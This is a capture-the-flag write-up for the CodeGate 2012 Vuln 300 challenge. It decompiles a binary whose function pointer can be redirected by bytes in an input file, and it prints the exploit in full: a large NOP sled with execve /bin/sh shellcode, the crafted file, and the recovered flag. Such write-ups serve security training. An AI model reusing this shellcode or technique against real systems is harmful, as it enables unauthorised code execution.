CodeGate 2012 Quals – Vuln 300

Here we are given ssh credentials where we need to exploit the binary.

Summary: compose file to make program jump to stack.

Let’s decompile it the binary:

int func() {
    puts("func");
    return 0;
}
 
int main(int argc, char *argv[]) {
    char s[12];
    memset(s, 0x90u, 0x12u);
    FILE *stream = fopen(argv[1], "r");
    if (stream) {
        int nread = fread(s, 1u, 0xCu, stream);
        if (nread == 12) {
            fclose(stream);
 
            void (*ptr)() = func; // 0x08048540
            unsigned int b4 = (s[4] | 1) ^ 0xE0;
            unsigned int b3 = (s[1] | 1) ^ 0xE0;
            b3 <<= 16;
            b4 <<= 24;
            strncpy(test, s, 0x12u); // ???
            ptr = (b4 | b3 | ptr);
            ptr();
            return 0;
        }
    }
    return 1;
}

The algorithm is simple – 12 bytes are read from argv[1] and 2nd and 5th are used to modify ptr which is called later.

The stack here is executable, so it’s straightforward: we should make ptr pointing to stack to our payload.

The stack addresses here are like 0xbfbfXXXX. So, the needed symbol is
0xBF ^ 0xE0 = '_' or
0xBF ^ 0xE1 = '^'

So, if we put twelve “_” into a file, we’ll jump to 0xbfbf8540.

Then we just put this stuff into a file and push a huge nopsled with shellcode:

$ mkdir /tmp/solve
$ cd /tmp/solve
$ export SC="` perl -e 'print "\x90"x100000 . "\xeb\x0d\x5f\x31\xc0\x50\x89\xe2\x52\x57\x54\xb0\x3b\xcd\x80\xe8\xee\xff\xff\xff/bin/sh";'`"
$ echo '^^^^^^^^^^^^^^^^^^^^^^^' >test
~/X ./test
 
$ cat ~/password
key_is_The_davinci_cod3_!

The flag: key_is_The_davinci_cod3_!

2 comments

    • yegreS on February 26, 2012 at 20:06
    • Reply

    What tools do you use to decompile binary?

    1. You can use IDA with Hex-Rays ;) And some manual fixing

Leave a Reply

Your email address will not be published.